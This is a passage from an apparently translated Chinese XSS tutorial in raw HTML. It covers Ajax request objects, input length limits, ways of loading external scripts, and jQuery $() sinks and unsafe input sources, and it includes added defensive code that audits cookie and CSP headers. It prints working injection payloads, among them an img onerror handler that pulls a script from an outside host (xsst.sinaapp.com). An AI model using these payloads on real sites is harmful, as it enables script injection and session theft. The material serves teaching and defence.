12px;">Same-origin request</span></p></td><td width="225.66666666666666" style="margin: 0px; padding: 6px 13px; word-break: break-all; border-width: 1px; border-style: solid; border-color: gainsboro; max-width: 100%; overflow-wrap: break-word !important; box-sizing: border-box !important;"><p style="max-width: 100%; clear: both; min-height: 1em; font-size: 16px; font-family: 宋体; box-sizing: border-box !important; overflow-wrap: break-word !important;"><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-size: 12px;">ActiveXObject("Microsoft.XMLHTTP") ActiveXObject("MSXML2.XMLHTTP")</span></p></td><td width="166.00000000000003" style="margin: 0px; padding: 6px 13px; word-break: break-all; border-width: 1px; border-style: solid; border-color: gainsboro; max-width: 100%; overflow-wrap: break-word !important; box-sizing: border-box !important;"><p style="max-width: 100%; clear: both; min-height: 1em; font-size: 16px; font-family: 宋体; box-sizing: border-box !important; overflow-wrap: break-word !important;">XMLHttpRequest</p></td></tr><tr style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;"><td width="106" style="margin: 0px; padding: 6px 13px; word-break: break-all; border-width: 1px; border-style: solid; border-color: gainsboro; max-width: 100%; overflow-wrap: break-word !important; box-sizing: border-box !important;"><p style="max-width: 100%; clear: both; min-height: 1em; font-size: 16px; font-family: 宋体; box-sizing: border-box !important; overflow-wrap: break-word !important;"><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-size: 12px;">Cross-origin request</span></p></td><td width="225.66666666666666" style="margin: 0px; padding: 6px 13px; word-break: break-all; border-width: 1px; border-style: solid; border-color: gainsboro; max-width: 100%; overflow-wrap: 
break-word !important; box-sizing: border-box !important;"><p style="max-width: 100%; clear: both; min-height: 1em; font-size: 16px; font-family: 宋体; box-sizing: border-box !important; overflow-wrap: break-word !important;"><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-size: 12px;">XDomainRequest</span></p></td><td width="166.00000000000003" style="margin: 0px; padding: 6px 13px; word-break: break-all; border-width: 1px; border-style: solid; border-color: gainsboro; max-width: 100%; overflow-wrap: break-word !important; box-sizing: border-box !important;"><p style="max-width: 100%; clear: both; min-height: 1em; font-size: 16px; font-family: 宋体; box-sizing: border-box !important; overflow-wrap: break-word !important;">XMLHttpRequest</p></td></tr></tbody></table><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;"/></p></section><p></p><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 14px; line-height: 2; letter-spacing: 1px;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;">Earlier web pages transferred the entire page result, wasting a great deal of network bandwidth. With Ajax, the client exchanges only the updated content with the server, and client-side JavaScript handles the server's response.</p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, 
"Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); overflow-wrap: break-word !important;"/></p></section><p></p><p><img style="max-width:100%!important;height:auto!important;" src="/uploads/ueditor/20200226/1-2002261H42VS.png" title="XSS漏洞挖掘之跨站脚本攻击(图5)" alt="XSS漏洞挖掘之跨站脚本攻击(图5)"/></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;">The XMLHttpRequest object is set up beforehand in a subroutine. The data is placed after the server URL, separated by a “?” character, and everything after the question mark is parsed into key-value pairs. The MIME type of the sent data is usually application/x-www-form-urlencoded. The advantage of XMLHttpRequest is that it can read text data from the server in different forms, including XML.</p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">5.1.2.4 Input length limits</strong></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;">Comparing the three delivery methods above, the second has the longest code, and that only builds a single form; one can imagine that constructing a complete page for a phishing attack would take far more code. Beyond phishing, special cases such as using XSS to harvest the user's page information or to build a Web worm also need long code. In real environments, however, the server side very often limits the length of client input.</p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: 
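-apple-system-font;"/></p>
<p>Input length limits, as the splitting trick in 4.4 shows, do not stop a determined payload; what decides whether the img, form and Ajax senders in 5.1.2.1 to 5.1.2.3 actually get anything is the response side. All three read <code>document.cookie</code>, which never contains a cookie carrying the <code>HttpOnly</code> flag, and all three run as inline script, which a <code>Content-Security-Policy</code> without <code>'unsafe-inline'</code> refuses to execute. The JavaScript below is an added example and not code from the original article: it parses <code>Set-Cookie</code> and <code>Content-Security-Policy</code> header values and lists the findings a defender would want to fix. The header values are constructed sample data and the cookie name <code>PHPSESSID</code> is an assumption.</p>

```javascript
// Added example (not from the original article): audit the two response headers
// that decide whether the cookie-sending payloads above get anything. Header
// values below are constructed sample data; the cookie name is an assumption.

// Parse one Set-Cookie header value into the cookie name and its attributes
// (attribute names lower-cased; flag attributes such as HttpOnly map to true).
function parseSetCookie(value) {
  const parts = value.split(';').map((p) => p.trim()).filter(Boolean);
  const name = parts[0].split('=')[0].trim();
  const attrs = new Map();
  for (const p of parts.slice(1)) {
    const eq = p.indexOf('=');
    if (eq === -1) attrs.set(p.toLowerCase(), true);
    else attrs.set(p.slice(0, eq).trim().toLowerCase(), p.slice(eq + 1).trim());
  }
  return { name, attrs };
}

// Without HttpOnly the cookie is readable through document.cookie, which is what
// all three senders (img, form, XMLHttpRequest) rely on; without Secure it also
// travels over plaintext HTTP; without SameSite it rides on cross-site requests.
function auditCookie(setCookieValue) {
  const { name, attrs } = parseSetCookie(setCookieValue);
  const findings = [];
  if (!attrs.has('httponly')) findings.push(`${name}: missing HttpOnly (readable via document.cookie)`);
  if (!attrs.has('secure')) findings.push(`${name}: missing Secure`);
  if (!attrs.has('samesite')) findings.push(`${name}: missing SameSite`);
  return findings;
}

// Parse a Content-Security-Policy value into a map from directive to source list.
function parseCsp(value) {
  const directives = new Map();
  for (const d of value.split(';')) {
    const tokens = d.trim().split(/\s+/).filter(Boolean);
    if (tokens.length) directives.set(tokens[0].toLowerCase(), tokens.slice(1).map((t) => t.toLowerCase()));
  }
  return directives;
}

// The effective script policy is script-src, falling back to default-src.
// 'unsafe-inline' lets the injected inline script run; a wildcard or bare scheme
// source lets a script tag pull code from any host.
function auditCsp(cspValue) {
  if (!cspValue) return ['no Content-Security-Policy header'];
  const directives = parseCsp(cspValue);
  const script = directives.get('script-src') || directives.get('default-src');
  if (!script) return ['no script-src or default-src directive'];
  const findings = [];
  if (script.includes("'unsafe-inline'")) findings.push("script-src allows 'unsafe-inline'");
  if (script.some((s) => s === '*' || s === 'http:' || s === 'https:')) findings.push('script-src allows scripts from any host');
  return findings;
}

// headers: plain object with lower-case keys; set-cookie is an array, which is
// the shape Node's http module returns in res.headers.
function auditResponseHeaders(headers) {
  const findings = [];
  for (const c of headers['set-cookie'] || []) findings.push(...auditCookie(c));
  findings.push(...auditCsp(headers['content-security-policy']));
  return findings;
}

// Constructed samples: a weak response beside a hardened one.
const WEAK_HEADERS = {
  'set-cookie': ['PHPSESSID=abc123; Path=/'],
  'content-security-policy': "default-src 'self'; script-src 'self' 'unsafe-inline' *",
};
const HARDENED_HEADERS = {
  'set-cookie': ['PHPSESSID=abc123; Path=/; HttpOnly; Secure; SameSite=Lax'],
  'content-security-policy': "default-src 'self'; script-src 'self'",
};

for (const [label, h] of [['weak', WEAK_HEADERS], ['hardened', HARDENED_HEADERS]]) {
  console.log(label, auditResponseHeaders(h));
}
```

<p>Run under Node, the weak response yields five findings and the hardened one none. To audit a real login response, pass <code>res.headers</code> from Node's <code>http</code> module straight in; <code>set-cookie</code> is already an array there. HttpOnly does not make the XSS go away, it only removes the cookie from what the three senders can collect; the CSP check is the one that stops the injected script from running at all.</p>
<p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: 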
-apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; font-size: 14px; letter-spacing: 0.5px; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); overflow-wrap: break-word !important;"/></p><p><img style="max-width:100%!important;height:auto!important;" src="/uploads/ueditor/20200226/1-2002261H455232.png" title="XSS漏洞挖掘之跨站脚本攻击(图6)" alt="XSS漏洞挖掘之跨站脚本攻击(图6)"/></p><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 14px; line-height: 2; letter-spacing: 1px;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">5.1.2.5 Loading external scripts</strong></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">1. 
Static creation</strong></p></section><p></p><section powered-by="xiumi.us" style="margin: 10px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"><section style="margin: 0px; padding: 10px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; width: 677px; border-width: 2px; border-style: dashed; border-color: rgb(192, 200, 209); background-color: rgb(239, 239, 239);"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 14px;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;"><script src="JS地址"></script></p></section></section></section><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 14px; line-height: 2; letter-spacing: 1px;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;"/></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">2. 
Dynamic creation</strong></p></section><section powered-by="xiumi.us" style="margin: 10px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"><section style="margin: 0px; padding: 10px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; width: 677px; border-width: 2px; border-style: dashed; border-color: rgb(192, 200, 209); background-color: rgb(239, 239, 239);"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 14px;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;"><script><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/>var s=document.createElement("script");<br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/>s.src="JS地址";<br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/>(document.body||document.documentElement).appendChild(s);<br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></script></p></section></section></section><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 14px; line-height: 2; letter-spacing: 1px;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p><p style="margin-top: 0px; margin-bottom: 
0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">3. Loading external JS through an image tag</strong></p></section><section powered-by="xiumi.us" style="margin: 10px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"><section style="margin: 0px; padding: 10px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; width: 677px; border-width: 2px; border-style: dashed; border-color: rgb(192, 200, 209); background-color: rgb(239, 239, 239);"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 14px; line-height: 1.6; letter-spacing: 0px;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><img style=display:none src=1 onerror=&#39;var s=document.createElement("script");s.src="http://xsst.sinaapp.com/m.js";(document.body||document.documentElement).appendChild(s);&#39; /></p></section></section></section><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 14px; line-height: 2; letter-spacing: 1px;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; 
overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">4. Borrowing jQuery</strong></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;">$</p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;">We often pass a string to $ to select or create DOM elements, but if that string comes from user input, this pattern is risky.</p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;">First, a demo:</p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;"><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; color: rgb(95, 156, 239);">http://jsbin.com/duwuzonife/1/edit?html,js,output</span></p></section><section powered-by="xiumi.us" style="margin: 10px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"><section style="margin: 0px; padding: 10px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; width: 677px; border-width: 2px; border-style: dashed; border-color: rgb(192, 200, 209); background-color: rgb(239, 239, 
239);"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 14px;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;">$("<img src=&#39;&#39; onerror=&#39;alert();&#39;>");</p></section></section></section><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 14px; line-height: 2; letter-spacing: 1px; color: rgba(0, 0, 0, 0.96);"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;"><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">When the user-supplied string looks like this, the img element is not inserted into the page's DOM right away, but the DOM element has already been created and is held in memory. For an img element, as soon as its src attribute is set the browser immediately requests the resource that src points to (a behaviour that can also be used to preload images). In the sample code above the element's attributes, including src and the onerror event handler, are set at the moment it is created, so the browser requests the image at once; the request obviously fails, the onerror callback fires immediately, and the JavaScript code runs.</span></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 
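1em; white-space: normal; overflow-wrap: break-word !important;">Why the demo above fires, and how to keep user input out of that path, as an added example that is not code from the original post or from jQuery itself: the block below mirrors the rule jQuery 1.9 and later use to decide whether a string handed to $() is HTML or a selector, and pairs it with an allow-list check for the one selector shape that may legitimately come from user input (an id taken from the URL fragment, say). The helper names jqueryWouldParseAsHtml, selectorFromUserInput and classify and the sample strings are constructed for this example; it needs no jQuery and runs under Node.</p>

```javascript
// Added example: models jQuery 1.9+'s "is this string HTML or a selector?"
// decision and guards user-controlled strings before they reach $().
// Helper names are hypothetical; this is not jQuery's code.

// jQuery's quick-match expression: after optional whitespace, a string that
// starts with "<" and ends with ">" is HTML (capture group 1); "#id" is a
// bare id lookup (capture group 2). Anything else is run as a CSS selector.
const QUICK_EXPR = /^(?:\s*(<[\w\W]+>)[^>]*|#([\w-]+))$/;

// True when $() would hand the string to the HTML parser (so attributes such
// as src and onerror are applied at creation time, before any insertion).
function jqueryWouldParseAsHtml(str) {
  if (typeof str !== "string") return false;
  // Fast path used by jQuery: "<...>" of length >= 3 is HTML outright.
  if (str[0] === "<" && str[str.length - 1] === ">" && str.length >= 3) return true;
  const m = QUICK_EXPR.exec(str);
  return !!(m && m[1]);
}

// Allow-list for the only selector shape this page lets a user choose:
// "#" followed by an identifier. Everything else is rejected, not repaired.
const SAFE_ID_SELECTOR = /^#[A-Za-z][\w-]{0,63}$/;

function selectorFromUserInput(str) {
  return SAFE_ID_SELECTOR.test(str) ? str : null;
}

// Constructed sample inputs, including the demo string from the post.
const SAMPLES = [
  "#main",                               // plain id selector
  "div.panel > a",                       // valid selector, but not user-choosable
  "<img src='' onerror='alert();'>",     // the demo: parsed as HTML, onerror fires
  "  <b>bold</b>",                       // leading whitespace still counts as HTML
  "user<b>name</b>",                     // selector in 1.9+; HTML in jQuery < 1.9
];

// Reports, per input, whether $() would parse it as HTML and whether the
// allow-list would let it through.
function classify(samples) {
  return samples.map((s) => ({
    input: s,
    html: jqueryWouldParseAsHtml(s),
    allowed: selectorFromUserInput(s) !== null,
  }));
}

console.table(classify(SAMPLES));
```

<p>If a string really must come from user input, run it through a check like selectorFromUserInput first or avoid $() for it entirely and use $(document).find(str), which never treats its argument as HTML; when the goal is to display user text, use .text() rather than .html() or .append(str), because those run the string through the HTML parser just as $() does.</p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 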
1em; white-space: normal; overflow-wrap: break-word !important;">Recommended reading, the official documentation for $:<span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; color: rgb(95, 156, 239);">http://api.jquery.com/jQuery/</span></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;">Other methods that behave the same way</p></section><section powered-by="xiumi.us" style="margin: 10px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"><section style="margin: 0px; padding: 10px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; width: 677px; border-width: 2px; border-style: dashed; border-color: rgb(192, 200, 209); background-color: rgb(239, 239, 239);"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 14px;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;">.after()<br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/>.append()<br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/>.appendTo()<br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/>.before()<br style="margin: 0px; padding: 
0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/>.html()<br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/>.insertAfter()<br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/>.insertBefore()<br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/>.prepend()<br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/>.prependTo()<br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/>.replaceAll()<br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/>.replaceWith()<br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/>.unwrap()<br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/>.wrap()<br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/>.wrapAll()<br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/>.wrapInner()</p></section></section></section><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 14px; line-height: 2; letter-spacing: 1px; color: rgba(0, 0, 0, 0.96);"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;"><br style="margin: 
0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;">These methods not only create DOM elements but also insert them into the page's DOM tree immediately. Inline JS inserted with a script tag is executed at once.</p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;">Unsafe input sources</p></section><section powered-by="xiumi.us" style="margin: 10px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"><section style="margin: 0px; padding: 10px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; width: 677px; border-width: 2px; border-style: dashed; border-color: rgb(192, 200, 209); background-color: rgb(239, 239, 239);"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 14px;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;">document.URL *<br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/>document.location.pathname *<br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/>document.location.href *<br style="margin: 0px; 
padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/>document.location.search *<br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/>document.location.hash<br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/>document.referrer *<br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/>window.name<br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/>document.cookie</p></section></section></section><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 14px; line-height: 2; letter-spacing: 1px; color: rgba(0, 0, 0, 0.96);"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/>Most properties of document can also be reached through the global window object. The properties marked with * return a URL-encoded (urlencode) string, which has to be decoded before it can pose a threat.</p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; text-align: justify; background-color: rgb(255, 255, 255); overflow-wrap: break-word !important;"/></p></section><p></p><p><img style="max-width:100%!important;height:auto!important;" src="/uploads/ueditor/20200226/1-2002261H546109.png" 
title="XSS漏洞挖掘之跨站脚本攻击(图7)" alt="XSS漏洞挖掘之跨站脚本攻击(图7)"/></p><section powered-by="xiumi.us" style="margin: 30px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"><section style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; width: 677px; vertical-align: top; border-width: 1px; border-radius: 0px; border-style: none; border-color: rgb(76, 68, 71); background-color: rgb(238, 233, 241);"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"><section style="margin: -3px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; align-items: center; display: flex;"><section style="margin: -10px 0px -10px 20px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; vertical-align: bottom; width: auto; flex: 0 0 auto; border-width: 0px; border-radius: 0px; border-style: none; border-color: rgb(76, 68, 71);"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: 